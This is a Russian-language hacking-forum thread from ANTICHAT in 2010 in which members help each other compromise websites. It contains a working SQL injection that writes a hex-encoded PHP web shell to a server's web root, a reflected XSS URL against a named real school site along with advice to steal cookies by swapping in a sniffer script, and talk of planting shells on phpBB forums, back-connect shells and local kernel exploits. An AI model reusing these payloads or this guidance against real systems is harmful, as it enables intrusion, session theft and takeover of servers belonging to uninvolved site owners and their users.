HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.04.2010, 02:16
Darren
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами: 9424793

Репутация: 13
По умолчанию

.Slip не конектится через wso не могу поять почему выходит ошибка
скопировал phpadmin выходит такая ошибка

Cannot load mysql extension. Please check your PHP configuration. - Documentation

на хосте размещаются ещё несколько сайтов на некоторых есть пхпадмин захожу туда - точно такая же ошибка ... Что может это может быть?
 
Ответить с цитированием

  #2  
Старый 08.04.2010, 09:10
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
С нами: 8943448

Репутация: 127
По умолчанию

сори за глупый вопрос, но вот пытаюсь залить шелл вот так:
detalle.php?id=-1+union+select+0x3C3F73797374656D28245F4745545B222 0636D64225D293B3F3E,2,3,4,5,6+into+outfile+'/home/site/html/shell.php'--

3C3F73797374656D28245F4745545B2220636D64225D293B3F 3E -- это я захексил <?system($_GET[cmd]);?>

проблема в том что кавычки в этом месте слешируются '/home/site/html/shell.php' что можно сделать?
 
Ответить с цитированием

  #3  
Старый 08.04.2010, 09:41
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Цитата:
Сообщение от Bramin  
сори за глупый вопрос, но вот пытаюсь залить шелл вот так:
detalle.php?id=-1+union+select+0x3C3F73797374656D28245F4745545B222 0636D64225D293B3F3E,2,3,4,5,6+into+outfile+'/home/site/html/shell.php'--

3C3F73797374656D28245F4745545B2220636D64225D293B3F 3E -- это я захексил <?system($_GET[cmd]);?>

проблема в том что кавычки в этом месте слешируются '/home/site/html/shell.php' что можно сделать?
Если maqic_quotes включен, то никак. Есть один вариант, через двойные запросы, вроде бы Scipio писал.
Но сомневаюсь, что ты понимаешь что это такое и как это реализовать, потому что вопрос действитеьно глупый.
 
Ответить с цитированием

  #4  
Старый 08.04.2010, 13:47
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

Там фреймы
 
Ответить с цитированием

  #5  
Старый 08.04.2010, 16:10
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

не канает метод шанкара... остальные тожe,
когда аватарку загружаю выдает вот это

Unable to upload file

DEBUG MODE

Line : 251
File : usercp_avatar.php

Что посоветуете?
 
Ответить с цитированием

  #6  
Старый 08.04.2010, 19:25
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Цитата:
Сообщение от Gorev  
не канает метод шанкара... остальные тожe,
когда аватарку загружаю выдает вот это

Unable to upload file

DEBUG MODE

Line : 251
File : usercp_avatar.php

Что посоветуете?
а какие остальные? В подпись eval пробовал совать? Есть вопросы - PM

PS: решено)

Последний раз редактировалось Pashkela; 08.04.2010 в 19:43..
 
Ответить с цитированием

  #7  
Старый 08.04.2010, 19:18
-oleg-
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8470145

Репутация: 0
По умолчанию

помогите! на сайте http://school145.edu.kh.ua/ есть пассивная xss как стырить куки?
 
Ответить с цитированием

  #8  
Старый 08.04.2010, 19:27
total90
Участник форума
Регистрация: 30.09.2009
Сообщений: 148
С нами: 8743576

Репутация: 241
По умолчанию

Цитата:
Сообщение от -oleg-  
помогите! на сайте http://school145.edu.kh.ua/ есть пассивная xss как стырить куки?
http://school145.edu.kh.ua/livesearch/search/query/?value="><script>alert()</script>
вместо "><script>alert()</script> скрипт сниффера(например sniffer.xaknet.ru)
 
Ответить с цитированием

  #9  
Старый 08.04.2010, 21:01
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Ну что же друзья, может это будет и оффтоп , но решилась не одна проблема по заливке шелла на форум пхпбб, много форумов у которых не срабатывал ни один общеизветсный способ заливки кода ,сегодня стали достоянием моего списка с шеллами. И все благодаря способу который Pashkela описал тут link .Всем рекомендую.
 
Ответить с цитированием

  #10  
Старый 08.04.2010, 21:34
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами: 8728261

Репутация: 211
По умолчанию

вообщем такая проблемка,есть linux (debian) 2.6.18. залил шелл wso2,биндпорт,бэкконнект
не проходит... при вводе which gcc ничего не показует, хотя на вкладке шелла [sec. info] явно показует (gcc version 4.1.2 20061115 (prerelease)... как быть дальше? может попробовать скомпилированый сплоит под это ядро? вот только где взять компилированый? wget присутствует...
P.S. Я так понимаю что если выход в инет осуществляется через VPN сервер то бэкконект и биндпорт непроканает?...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.